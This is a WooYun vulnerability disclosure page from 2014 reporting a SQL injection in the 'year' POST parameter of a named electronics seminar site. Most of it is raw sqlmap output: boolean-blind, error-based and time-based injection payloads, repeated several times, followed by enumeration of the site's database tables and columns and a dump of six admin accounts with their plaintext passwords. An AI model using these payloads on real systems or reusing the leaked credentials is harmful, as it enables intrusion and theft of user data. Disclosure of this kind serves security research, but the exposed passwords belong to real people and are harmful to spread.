当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080306

漏洞标题:某大型电子中国高危SQL注射可能导致全库泄露

相关厂商:中国电子网

漏洞作者: 路人甲

提交时间:2014-10-22 11:06

修复时间:2014-12-06 11:08

公开时间:2014-12-06 11:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某大型电子中国高危SQL注射 # 全库泄露

详细说明:

某大型电子中国高危SQL注射 # 全库泄露
分站存在post注入

漏洞证明:

注入连接:http://seminar.21ic.com:80/vod/byTime (POST)
searchType=CALENDAR&searchName=wYpP&month=1&year=2007&button=%E6%9F%A5%E8%AF%A2
sqlmap identified the following injection points with a total of 857 HTTP(s) requests:
---
Place: POST
Parameter: year
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: year
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0
available databases [2]:
[*] 21ic_seminar
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: year
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0
Database: 21ic_seminar
[28 tables]
+------------------+
| YiiLog |
| user |
| admin |
| admin_action |
| announce |
| bulletin |
| c_promotion |
| change_award |
| chat |
| corp |
| customer |
| email_view |
| inquire |
| inquire_answer |
| inquire_item |
| inquire_question |
| join_meeting |
| link |
| link_click |
| meeting |
| meeting_cate |
| meeting_pre |
| mirror |
| signup_meeting |
| sqlmapoutput |
| temp_user |
| user_point |
| user_promotion |
+------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: year
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0
Database: 21ic_seminar
Table: temp_user
[11 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| address | varchar(250) |
| city | varchar(50) |
| corp | varchar(250) |
| email | varchar(250) |
| industrial | varchar(250) |
| mobile | varchar(50) |
| postcode | varchar(50) |
| province | varchar(50) |
| tel | varchar(250) |
| truename | varchar(250) |
| username | varchar(250) |
+------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: year
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0
Database: 21ic_seminar
Table: admin
[4 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| admin_id | int(11) |
| admin_name | varchar(50) |
| admin_password | varchar(250) |
| admin_priv | tinyint(4) |
+----------------+--------------+
Database: 21ic_seminar
Table: user
[28 columns]
+-----------------+---------------------+
| Column | Type |
+-----------------+---------------------+
| address | varchar(250) |
| auth_code | varchar(50) |
| auth_date | datetime |
| auth_email | varchar(150) |
| auth_ip | varchar(50) |
| auth_web | varchar(150) |
| bbs_sync | tinyint(3) unsigned |
| bbs_user_id | int(11) |
| c_pr_id | int(11) |
| city | varchar(50) |
| corp | varchar(250) |
| department | varchar(250) |
| email | varchar(250) |
| filter | int(11) |
| industrial | varchar(250) |
| is_auth | tinyint(3) unsigned |
| is_auth_check | tinyint(3) unsigned |
| is_auth_lock | int(11) |
| mobile | varchar(50) |
| postcode | varchar(50) |
| promotion_point | int(11) |
| province | varchar(50) |
| responsibility | varchar(50) |
| tel | varchar(250) |
| truename | varchar(250) |
| update_date | datetime |
| user_id | int(11) |
| username | varchar(250) |
+-----------------+---------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: year
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: year
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0
Database: 21ic_seminar
Table: admin
[6 entries]
+-------------+
| admin_name |
+-------------+
| admin |
| karen |
| Seminar21ic |
| test001 |
| xufang |
| yqg |
+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: year
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0
Database: 21ic_seminar
Table: admin
[6 entries]
+-------------+------------------+
| admin_name | admin_password |
+-------------+------------------+
| admin | Seminar_2121 |
| karen | karen800316 |
| Seminar21ic | 2014_Seminar_Jyx |
| test001 | 21iccom |
| xufang | XUFANG20140521 |
| yqg | yqg*2013 |
+-------------+------------------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:4 (WooYun评价)